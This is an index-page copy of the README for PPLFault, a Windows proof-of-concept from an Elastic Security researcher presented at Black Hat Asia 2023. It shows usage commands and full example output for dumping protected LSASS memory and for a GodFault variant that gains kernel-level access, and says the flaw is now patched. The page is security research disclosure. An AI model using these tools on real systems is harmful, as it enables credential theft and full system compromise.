Ecosyste.ms: Awesome

An open API service indexing awesome lists of open source software.

Awesome Lists | Featured Topics | Projects

https://github.com/gabriellandau/PPLFault

Last synced: 5 days ago
JSON representation

Host: GitHub
URL: https://github.com/gabriellandau/PPLFault
Owner: gabriellandau
License: other
Created: 2022-09-22T19:39:24.000Z (about 2 years ago)
Default Branch: main
Last Pushed: 2024-02-22T17:23:53.000Z (9 months ago)
Last Synced: 2024-10-08T13:10:59.705Z (about 1 month ago)
Language: C
Size: 214 KB
Stars: 501
Watchers: 8
Forks: 84
Open Issues: 0
Metadata Files:
- Readme: README.md
- License: LICENSE.txt

Awesome Lists containing this project

README

        # PPLFault

By [Gabriel Landau](https://twitter.com/GabrielLandau) at [Elastic Security](https://www.elastic.co/security-labs/).

From [PPLdump Is Dead. Long Live PPLdump!](https://www.blackhat.com/asia-23/briefings/schedule/#ppldump-is-dead-long-live-ppldump-31052) presented at [Black Hat Asia 2023](https://www.blackhat.com/asia-23).

[![PPLdump Is Dead. Long Live PPLdump!](http://img.youtube.com/vi/5xteW8Tm410/0.jpg)](http://www.youtube.com/watch?v=5xteW8Tm410 "PPLdump Is Dead. Long Live PPLdump!")

## PPLFault

**2024-02 UPDATE: Microsoft patched PPLFault on 2024-02-13.  See [this thread](https://x.com/GabrielLandau/status/1757818200127946922?s=20) for related discussion.**

Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.  For more details on the exploit, see my [slides](http://i.blackhat.com/Asia-23/AS-23-Landau-PPLdump-Is-Dead-Long-Live-PPLdump.pdf) and/or [talk](https://x.com/GabrielLandau/status/1707773387731272085).

### Example Output

```

PS C:\Users\user\Desktop> cmd /c ver

Microsoft Windows [Version 10.0.25346.1001]

PS C:\Users\user\Desktop> tasklist | findstr lsass

lsass.exe                      992 Services                   0     76,620 K

PS C:\Users\user\Desktop> (Get-NtProcess -Access QueryLimitedInformation -Pid 992).Protection

Type           Signer

----           ------

ProtectedLight Lsa

PS C:\Users\user\Desktop> dir *.dmp

PS C:\Users\user\Desktop> .\PPLFault.exe -v 992 lsass.dmp

 [+] No cleanup necessary.  Backup does not exist.

 [+] GetShellcode: 528 bytes of shellcode written over DLL entrypoint

 [+] Benign: C:\Windows\System32\EventAggregation.dll.bak

 [+] Payload: C:\PPLFaultTemp\PPLFaultPayload.dll

 [+] Placeholder: C:\PPLFaultTemp\EventAggregationPH.dll

 [+] Acquired exclusive oplock to file: C:\Windows\System32\devobj.dll

 [+] Ready.  Spawning WinTcb.

 [+] SpawnPPL: Waiting for child process to finish.

 [+] FetchDataCallback called.

 [+] Hydrating 90112 bytes at offset 0

 [+] Switching to payload

 [+] Emptying system working set

 [+] Working set purged

 [+] Give the memory manager a moment to think

 [+] Hydrating 90112 PAYLOAD bytes at offset 0

 [+] Dump saved to: lsass.dmp

 [+] Dump is 74.9 MB

 [+] Operation took 937 ms

PS C:\Users\user\Desktop> dir *.dmp

    Directory: C:\Users\user\Desktop

Mode                 LastWriteTime         Length Name

----                 -------------         ------ ----

-a----          5/1/2023  11:18 AM       78581973 lsass.dmp

```

## GodFault

Exploits the same TOCTOU as PPLFault.  However instead of dumping a process, it migrates to CSRSS and exploits a vulnerability in `win32k!NtUserHardErrorControlCall` from [ANGRYORCHARD](https://github.com/gabriellandau/ANGRYORCHARD/blob/0a4720f7e07e86a9ac2783411b81efac14938e26/Exploit.c#L69-L81) to decrement `KTHREAD.PreviousMode` from `UserMode` (1) to `KernelMode` (0).  It proves "God Mode" access by opening `\Device\PhysicalMemory`, normally inaccessible from `UserMode`, as `SECTION_ALL_ACCESS`.

### Example Output

```

C:\Users\user\Desktop>GodFault.exe -v

 [?] Server does not appear to be running.  Attempting to install it...

 [+] No cleanup necessary.  Backup does not exist.

 [+] GetShellcode: 2304 bytes of shellcode written over DLL entrypoint

 [+] CSRSS PID is 772

 [+] Benign: C:\Windows\System32\EventAggregation.dll.bak

 [+] Payload: C:\GodFaultTemp\GodFaultPayload.dll

 [+] Placeholder: C:\GodFaultTemp\EventAggregationPH.dll

 [+] Acquired exclusive oplock to file: C:\Windows\System32\devobj.dll

 [+] Testing initial ability to acquire PROCESS_ALL_ACCESS to System: Failure

 [+] Ready.  Spawning WinTcb.

 [+] SpawnPPL: Waiting for child process to finish.

 [+] FetchDataCallback called.

 [+] Hydrating 90112 bytes at offset 0

 [+] Switching to payload

 [+] Emptying system working set

 [+] Working set purged

 [+] Give the memory manager a moment to think

 [+] Hydrating 90112 PAYLOAD bytes at offset 0

 [+] Thread 6248 (KTHREAD FFFFA283B0A62080) has been blessed

 [+] Testing post-exploit ability to acquire PROCESS_ALL_ACCESS to System: Success

 [+] Opened \Device\PhysicalMemory.  Handle is 0x1b4

 [+] Opened System process as PROCESS_ALL_ACCESS.  Handle is 0x1c0

 [+] Press any key to continue...

 [+] No cleanup necessary.  Backup does not exist.

```

## Python

PoC that achieves arbitrary code execution as WinTcb-Light without the CloudFilter API.  See [python/README.md](python/README.md).

## Tested Platforms

|  | Windows 11 22H2 22621.1702 (May 2023) | Windows 11 Insider Canary 25346.1001 (April 2023) |

| - | - | - |

| PPLFault | ✔️ | ✔️ |

| GodFault | ✔️ | ❌ Insider PreviousMode mitigation [bugchecks](https://twitter.com/GabrielLandau/status/1597001955909697536?s=20) |

# License

PPLFault is covered by the [ELv2 license](LICENSE.txt).  It uses [phnt](https://github.com/winsiderss/systeminformer/tree/25846070780183848dc8d8f335a54fa6e636e281/phnt) from SystemInformer under the [MIT license](phnt/LICENSE.txt).

# Credits

Inspired by [PPLdump](https://github.com/itm4n/PPLdump) by [Clément Labro](https://infosec.exchange/@itm4n), which Microsoft [patched](https://itm4n.github.io/the-end-of-ppldump/) in July 2022.

[ANGRYORCHARD](https://github.com/gabriellandau/ANGRYORCHARD) was created by [Austin Hudson](https://twitter.com/ilove2pwn_), who released it when Microsoft patched PPLdump.